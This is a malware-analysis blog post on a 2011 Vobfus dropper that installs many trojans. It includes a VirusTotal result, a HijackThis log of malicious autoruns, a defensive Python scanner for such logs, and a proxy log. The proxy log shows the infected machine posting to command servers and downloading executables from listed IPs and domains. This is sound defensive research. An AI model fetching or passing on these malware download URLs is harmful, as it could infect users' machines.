Vofbus: mega pack

For the past few days, Vofbus has been installing a "mega" pack of malware that wrecks the machines it lands on.
A quick look at today's update: http://www3.malekal.com/malwares/index.php?&hash=a8c6444ff84daa2d2730002cfaceaeaf

=> http://www.virustotal.com/file-scan/report.html?id=1a7ed8a7d77ae248e5c56f79190a7c4bba71486e587156afdd3bf08e6d8e6088-1306234555

The VirusTotal detection speaks for itself:

File name: a8c6444ff84daa2d2730002cfaceaeaf
Submission date: 2011-05-24 10:55:55 (UTC)
Current status: finished
Result: 0/ 43 (0.0%)
 

Antivirus     Version     Last Update     Result
AhnLab-V3    2011.05.24.03    2011.05.24    -
AntiVir    7.11.8.117    2011.05.24    -
Antiy-AVL    2.0.3.7    2011.05.24    -
Avast    4.8.1351.0    2011.05.24    -
Avast5    5.0.677.0    2011.05.24    -
AVG    10.0.0.1190    2011.05.24    -
BitDefender    7.2    2011.05.24    -
CAT-QuickHeal    11.00    2011.05.24    -
ClamAV    0.97.0.0    2011.05.24    -
Commtouch    5.3.2.6    2011.05.24    -
Comodo    8814    2011.05.24    -
DrWeb    5.0.2.03300    2011.05.24    -
Emsisoft    5.1.0.5    2011.05.24    -
eSafe    7.0.17.0    2011.05.22    -
eTrust-Vet    36.1.8344    2011.05.24    -
F-Prot    4.6.2.117    2011.05.24    -
F-Secure    9.0.16440.0    2011.05.24    -
Fortinet    4.2.257.0    2011.05.22    -
GData    22    2011.05.24    -
Ikarus    T3.1.1.104.0    2011.05.24    -
Jiangmin    13.0.900    2011.05.23    -
K7AntiVirus    9.103.4707    2011.05.23    -
Kaspersky    9.0.0.837    2011.05.24    -
McAfee    5.400.0.1158    2011.05.24    -
McAfee-GW-Edition    2010.1D    2011.05.23    -
Microsoft    1.6903    2011.05.24    -
NOD32    6147    2011.05.24    -
Norman    6.07.07    2011.05.23    -
nProtect    2011-05-24.01    2011.05.24    -
Panda    10.0.3.5    2011.05.23    -
PCTools    7.0.3.5    2011.05.19    -
Prevx    3.0    2011.05.24    -
Rising    23.59.01.03    2011.05.24    -
Sophos    4.65.0    2011.05.24    -
SUPERAntiSpyware    4.40.0.1006    2011.05.24    -
Symantec    20111.1.0.186    2011.05.24    -
TheHacker    6.7.0.1.203    2011.05.23    -
TrendMicro    9.200.0.1012    2011.05.24    -
TrendMicro-HouseCall    9.200.0.1012    2011.05.24    -
VBA32    3.12.16.0    2011.05.24    -
VIPRE    9374    2011.05.24    -
ViRobot    2011.5.24.4476    2011.05.24    -
VirusBuster    13.6.369.0    2011.05.23    -
Additional information
MD5   : a8c6444ff84daa2d2730002cfaceaeaf
SHA1  : e3959da7428073bee700c7a5c581ecacbc8419d2
SHA256: 1a7ed8a7d77ae248e5c56f79190a7c4bba71486e587156afdd3bf08e6d8e6088

The dropper installs the whole happy family: very quickly the machine is running a host of malware, including:

The HijackThis report obtained (an OTL report is available on pjjoint: http://pjjoint.malekal.com/files.php?read=q10w1510s9x14y15s7c15c9&html=on ).

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:46:30, on 24/05/2011
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\VMware\VMware Tools\vmacthlp.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
C:\DOCUMENTS AND SETTINGS\MAK\BUREAU\PROCEXP.EXE
C:\Program Files\VMware\VMware Tools\VMwareTray.exe
C:\Program Files\VMware\VMware Tools\VMwareUser.exe
C:\WINDOWS\aadrive32.exe
C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\avp.exe
C:\WINDOWS\lsass.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe
C:\WINDOWS\avp.exe
C:\WINDOWS\avp32.exe
C:\WINDOWS\spoolsv.exe
C:\WINDOWS\user.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\smss.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\winlogon.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\services.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Documents and Settings\Mak\Application Data\2.tmp
C:\WINDOWS\System32\wbem\wmiprvse.exe
C:\Documents and Settings\Mak\rsvhost.exe
C:\Documents and Settings\Mak\xqqoid.exe
C:\Documents and Settings\Mak\Bureau\HiJackThis.exe
C:\WINDOWS\System32\wbem\wmiprvse.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: C:\WINDOWS\system32\jb6xrjo.dll - {24A123C3-A500-99BD-A120-04B53A2C8952} - C:\WINDOWS\system32\jb6xrjo.dll - W32/Spyware-WebActiveClick-based but part of Trojan.Win32.Ertfor
O2 - BHO: (no name) - {F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} - c:\windows\system32\uqmcbwbu.dll - Trojan.Agent/Gen-Clicker
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [VMware Tools] "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
O4 - HKLM\..\Run: [VMware User Process] "C:\Program Files\VMware\VMware Tools\VMwareUser.exe"
O4 - HKLM\..\Run: [Malwarebytes' Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\Run: [HNUdHTgqO] C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [Microsoft Driver Setup] C:\WINDOWS\aadrive32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKfre] C:\WINDOWS\wininst.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgoA] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKfsc] C:\WINDOWS\winlogon.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKZe] C:\WINDOWS\avp.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKeg] C:\WINDOWS\smss.exe- Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgrA] C:\DOCUME~1\Mak\LOCALS~1\Temp\win32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKctc] C:\WINDOWS\msmgm.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKZSc] C:\WINDOWS\avp32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKeuf] C:\WINDOWS\spoolsv.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKee] C:\WINDOWS\user.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgre] C:\DOCUME~1\Mak\LOCALS~1\Temp\smss.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgpta] C:\DOCUME~1\Mak\LOCALS~1\Temp\services.exe- Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgrsc] C:\DOCUME~1\Mak\LOCALS~1\Temp\winlogon.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKcrc] C:\WINDOWS\login.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKcZ] C:\WINDOWS\mdm.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgph] C:\DOCUME~1\Mak\LOCALS~1\Temp\setup.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgoe] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgl/] C:\DOCUME~1\Mak\LOCALS~1\Temp\gdi32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKcuc] C:\WINDOWS\lsass.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe 
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [HNUdHTgqO] C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe- Trojan.Ertfor
O4 - HKCU\..\Run: [12CFG214-K641-12SF-N85P] C:\RECYCLER\S-1-5-21-0243936033-3052116371-381863308-1811\vsbntlo.exe - Trojan.Win32.Small / IRC.Backdoor (also wrongly detected as Trojan.FakeAlert)
O4 - HKCU\..\Run: [MKfre] C:\WINDOWS\wininst.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgoA] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKfsc] C:\WINDOWS\winlogon.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKZe] C:\WINDOWS\avp.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [engel] C:\Documents and Settings\Mak\Application Data\2.tmp.exe - Trojan.Dugenpal / TrojWare.Win32.Wintu
O4 - HKCU\..\Run: [MKeg] C:\WINDOWS\smss.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgrA] C:\DOCUME~1\Mak\LOCALS~1\Temp\win32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKctc] C:\WINDOWS\msmgm.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKZSc] C:\WINDOWS\avp32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKeuf] C:\WINDOWS\spoolsv.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKee] C:\WINDOWS\user.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgre] C:\DOCUME~1\Mak\LOCALS~1\Temp\smss.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgpta] C:\DOCUME~1\Mak\LOCALS~1\Temp\services.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgrsc] C:\DOCUME~1\Mak\LOCALS~1\Temp\winlogon.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKcrc] C:\WINDOWS\login.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKcZ] C:\WINDOWS\mdm.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgph] C:\DOCUME~1\Mak\LOCALS~1\Temp\setup.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgoe] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgl/] C:\DOCUME~1\Mak\LOCALS~1\Temp\gdi32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKcuc] C:\WINDOWS\lsass.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [xqqoid] C:\Documents and Settings\Mak\xqqoid.exe /E - Trojan.VobFus
O4 - HKLM\..\Policies\Explorer\Run: [Microsoft Driver Setup] C:\WINDOWS\aadrive32.exe - Backdoor.Win32.Floder
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O9 - Extra button: Fiddler2 - {CF819DA3-9882-4944-ADF5-6EF17ECF3C6E} - "C:\Program Files\Fiddler2\Fiddler.exe" (file missing)
O9 - Extra 'Tools' menuitem: Fiddler2 - {CF819DA3-9882-4944-ADF5-6EF17ECF3C6E} - "C:\Program Files\Fiddler2\Fiddler.exe" (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\program files\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll
O10 - Unknown file in Winsock LSP: c:\program files\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{99894DA6-6832-4ABD-BD49-E078DE026639}: NameServer = 80.10.246.2
O17 - HKLM\System\CCS\Services\Tcpip\..\{FB4F16C9-47D3-43E4-B696-743350A506B0}: NameServer = 80.10.246.2
O20 - Winlogon Notify: TPSvc - C:\WINDOWS\SYSTEM32\TPSvc.dll
O20 - Winlogon Notify: VMUpgradeAtShutdown - C:\WINDOWS\SYSTEM32\VMUpgradeAtShutdownWXP.dll
O22 - SharedTaskScheduler: osklef87hgudufhg87fuyATU7 - {24A123C3-A500-99BD-A120-04B53A2C8952} - C:\WINDOWS\system32\jb6xrjo.dll - W32/Spyware-WebActiveClick-based but part of Trojan.Win32.Ertfor
O23 - Service: TP AutoConnect Service (TPAutoConnSvc) - ThinPrint AG - C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
O23 - Service: TP VC Gateway Service (TPVCGateway) - ThinPrint AG - C:\Program Files\VMware\VMware Tools\TPVCGateway.exe
O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
O23 - Service: Aide de la mise à niveau VMware (VMUpgradeHelper) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
O23 - Service: Service d'aide du disque physique VMware (VMware Physical Disk Helper Service) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\vmacthlp.exe

--
End of file - 7955 bytes
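As an added example (my code, not the author's), the two things that jump out of the report above can be checked mechanically: Windows core process names (smss.exe, lsass.exe, winlogon.exe, services.exe, spoolsv.exe) running from anywhere but system32, and autorun entries pointing into Temp, RECYCLER, the root of C:\WINDOWS or the Policies\Explorer\Run key. The sample log is a short excerpt of the report above; the heuristics are mine, and the %SystemRoot%-root check is a weak one meant for review rather than a verdict.

```python
import re
from typing import Dict, List

# Core Windows binaries that, on XP, live only in %SystemRoot%\system32.
# The log above shows copies of them dropped into C:\WINDOWS\ and into the
# user's Temp folder, each registered under Run by Trojan.Ertfor.
SYSTEM_BINARIES = {
    "smss.exe", "csrss.exe", "winlogon.exe", "services.exe",
    "lsass.exe", "spoolsv.exe", "svchost.exe", "ctfmon.exe",
}
SYSTEM32 = r"c:\windows\system32"
WINDOWS_ROOT = r"c:\windows"
# Folders a legitimate autorun or long-lived process rarely starts from.
USER_WRITABLE_MARKERS = ("\\locals~1\\temp\\", "\\local settings\\temp\\", "\\recycler\\")

# Optional opening quote, drive letter, then lazily up to the first ".exe"
# followed by a quote, whitespace, a dash (the author's annotations) or EOL.
PATH_RE = re.compile(r'"?([A-Za-z]:\\.*?\.exe)(?=["\s-]|$)', re.IGNORECASE)
O4_RE = re.compile(r"^O4 - (?P<hive>[^:]+): \[(?P<name>[^\]]*)\] (?P<cmd>.+)$")

# Constructed excerpt of the HijackThis report above (clean and infected lines).
SAMPLE_LOG = r"""
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\lsass.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\smss.exe
C:\Program Files\VMware\VMware Tools\vmtoolsd.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
O4 - HKLM\..\Run: [VMware Tools] "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
O4 - HKLM\..\Run: [Microsoft Driver Setup] C:\WINDOWS\aadrive32.exe
O4 - HKLM\..\Run: [MKeg] C:\WINDOWS\smss.exe
O4 - HKLM\..\Run: [HNUdHTgpta] C:\DOCUME~1\Mak\LOCALS~1\Temp\services.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [12CFG214-K641-12SF-N85P] C:\RECYCLER\S-1-5-21-0243936033-3052116371-381863308-1811\vsbntlo.exe
O4 - HKLM\..\Policies\Explorer\Run: [Microsoft Driver Setup] C:\WINDOWS\aadrive32.exe
"""


def suspicious_reasons(path: str, hive: str = "") -> List[str]:
    """Heuristics an executable path trips; an empty list means nothing odd."""
    p = path.lower()
    directory, _, name = p.rpartition("\\")
    reasons = []
    if name in SYSTEM_BINARIES and directory != SYSTEM32:
        reasons.append(f"system binary name {name!r} outside system32")
    if directory == WINDOWS_ROOT and name != "explorer.exe":
        reasons.append("executable sits directly in %SystemRoot%")
    if any(marker in p for marker in USER_WRITABLE_MARKERS):
        reasons.append("starts from a Temp or RECYCLER folder")
    if r"policies\explorer\run" in hive.lower():
        reasons.append("Policies\\Explorer\\Run autorun, rarely used by legitimate software")
    return reasons


def scan_hijackthis(log_text: str) -> List[Dict[str, object]]:
    """Flag suspicious 'Running processes' entries and O4 autoruns in a HijackThis log."""
    findings: List[Dict[str, object]] = []
    for raw in log_text.splitlines():
        line = raw.strip()
        m = O4_RE.match(line)
        if m:
            pm = PATH_RE.match(m.group("cmd"))
            if pm is None:
                continue
            reasons = suspicious_reasons(pm.group(1), m.group("hive"))
            if reasons:
                findings.append({"kind": "autorun", "entry": m.group("name"),
                                 "path": pm.group(1), "reasons": reasons})
        elif re.match(r"^[A-Za-z]:\\", line):
            reasons = suspicious_reasons(line)
            if reasons:
                findings.append({"kind": "process", "entry": "", "path": line, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_hijackthis(SAMPLE_LOG):
        print(f"[{f['kind']:7}] {f['path']}")
        for reason in f["reasons"]:
            print(f"           - {reason}")
```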

Web connections established:

1306231669.128    574 192.168.1.27 TCP_MISS/302 1183 POST http://co102w.col102.mail.live.com/mail/SaveSentMessages.aspx?n=1181253781 - DIRECT/65.55.33.119 text/html
1306231671.317    775 192.168.1.27 TCP_MISS/200 14227 GET http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1287432649&rver=4.5.2130.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx%3Frru%3Dinbox&id=84839 - DIRECT/65.54.186.10 text/html
1306231689.340  63099 192.168.1.27 TCP_MISS/504 1515 POST http://71.58.170.102/u/ - DIRECT/71.58.170.102 text/html
1306231714.090   1023 192.168.1.27 TCP_MISS/200 97594 GET http://co102w.col102.mail.live.com/mail/InboxLight.aspx?n=1181253781 - DIRECT/65.55.33.119 text/html
1306231749.373    800 192.168.1.27 TCP_MISS/200 12462 POST http://co102w.col102.mail.live.com/mail/mail.fpp?cnmn=Microsoft.Msn.Hotmail.Ui.Fpp.MailBox.GetInboxData&ptid=0&a=BHIOs%2bMThVFvKN1h6WqACg%3d%3d&au=739537469 - DIRECT/65.55.33.119 application/x-javascript
1306231750.264  63104 192.168.1.27 TCP_MISS/504 1515 POST http://71.58.170.102/u/ - DIRECT/71.58.170.102 text/html
1306231829.336  63101 192.168.1.27 TCP_MISS/504 1515 POST http://71.86.118.158/u/ - DIRECT/71.86.118.158 text/html
1306232689.111    989 192.168.1.27 TCP_MISS/504 1513 POST http://61.125.77.240/s/ - DIRECT/61.125.77.240 text/html
1306233432.461    740 192.168.1.27 TCP_MISS/302 414 GET http://montefl.info/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/123.100.251.58 text/html
1306233432.584    101 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233432.757     97 192.168.1.27 TCP_MISS/302 414 GET http://prioset.org/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233432.799     39 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233436.068     71 192.168.1.27 TCP_MISS/200 390 GET http://api.wipmania.com/ - DIRECT/213.251.170.52 text/html
1306233437.604    328 192.168.1.27 TCP_MISS/200 34190 GET http://91.200.241.40/999.exe - DIRECT/91.200.241.40 application/octet-stream
1306233438.713     74 192.168.1.27 TCP_MISS/302 414 GET http://prioset.org/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233438.808     76 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233439.388    725 192.168.1.27 TCP_MISS/200 28050 GET http://96.44.181.226/images/3383.exe - DIRECT/96.44.181.226 application/x-msdos-program
1306233440.778    326 192.168.1.27 TCP_MISS/200 47907 GET http://91.200.241.40/bnet.exe - DIRECT/91.200.241.40 application/octet-stream
1306233441.098    203 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/lmzdd.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.104    207 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/vvvjzar.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.282    180 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/ivjwneei.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.287    180 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/uhhymdqu.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.293    184 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/kxyyp.php?adv=adv600&code1=JNQC&code2=8103&id=1080276621&p=1&b=1&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.466    181 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/scctgxkbb.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.474    181 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/bosgwxbeff.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.481    180 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/lyyyzdduh.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.596    127 192.168.1.27 TCP_MISS/000 0 GET http://aemodern.com/bdqqu/wjwwnae.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 -
1306233441.596    119 192.168.1.27 TCP_MISS/000 0 GET http://aemodern.com/bdqqu/vvvmmddhvl.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 -
1306233441.596    110 192.168.1.27 TCP_MISS/000 0 GET http://aemodern.com/bdqqu/hhlycptx.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 -
1306233442.186    346 192.168.1.27 TCP_MISS/200 59876 GET http://91.200.241.40/nw1jdcbhs.exe - DIRECT/91.200.241.40 application/octet-stream
1306233479.231    388 192.168.1.27 TCP_MISS/302 1247 POST http://msdn.microsoft.com/ - DIRECT/65.55.11.235 text/html
1306233479.791    947 192.168.1.27 TCP_MISS/302 1247 POST http://msdn.microsoft.com/ - DIRECT/65.55.11.235 text/html
1306233493.741    693 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233500.648    695 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233502.789   1009 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233504.756  63118 192.168.1.27 TCP_MISS/504 1541 GET http://ppppnipponp.r7m.us/cgi-bin/p.cgi - DIRECT/1.1.1.1 text/html
1306233512.508  63104 192.168.1.27 TCP_MISS/504 1541 GET http://ppppnipponp.r7m.us/cgi-bin/p.cgi - DIRECT/1.1.1.1 text/html
1306233514.231     75 192.168.1.27 TCP_MISS/302 414 GET http://prioset.org/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233514.365     75 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233515.163    992 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233521.443    381 192.168.1.27 TCP_MISS/200 1567 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233522.958    255 192.168.1.27 TCP_MISS/200 1567 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233532.177    836 192.168.1.27 TCP_MISS/200 36049 GET http://31.184.237.32/b.exe - DIRECT/31.184.237.32 application/x-msdownload
1306233567.517    205 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/vvvjzar.php?adv=adv413&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233571.428    180 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/lmzdd.php?adv=adv413&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233572.199    183 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/vvvmmddhvl.php?adv=adv413&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233578.689    181 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/kxyyp.php?adv=adv413&code1=KNIC&code2=0104&id=1080276621&p=1&b=1&c=135019922 - DIRECT/195.2.240.75 text/html
1306233594.428  63100 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233595.599   2584 192.168.1.27 TCP_MISS/200 89462 GET http://31.184.237.43/ngjefw.exe - DIRECT/31.184.237.43 application/octet-stream
1306233605.252  63097 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233616.412  63101 192.168.1.27 TCP_MISS/504 1515 POST http://68.60.106.144/s/ - DIRECT/68.60.106.144 text/html
1306233630.416  63103 192.168.1.27 TCP_MISS/504 1515 POST http://68.60.106.144/s/ - DIRECT/68.60.106.144 text/html
1306233648.711   3198 192.168.1.27 TCP_MISS/504 1514 POST http://91.176.198.112/s/ - DIRECT/91.176.198.112 text/html
1306233651.836  63101 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233652.678    425 192.168.1.27 TCP_MISS/502 1504 POST http://68.69.67.206/s/ - DIRECT/68.69.67.206 text/html
1306233654.754  21165 192.168.1.27 TCP_MISS/504 1514 POST http://91.176.198.112/s/ - DIRECT/91.176.198.112 text/html
1306233655.013    424 192.168.1.27 TCP_MISS/502 1504 POST http://68.69.67.206/s/ - DIRECT/68.69.67.206 text/html
1306233655.460  63101 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/s/ - DIRECT/70.104.104.153 text/html
1306233658.454    698 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233664.131    691 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233666.616  63100 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/s/ - DIRECT/70.104.104.153 text/html
1306233669.258    999 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233670.567    995 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233676.635   1047 192.168.1.27 TCP_MISS/200 163848 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233689.403    143 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233689.403    143 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233698.232    153 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233710.584     78 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
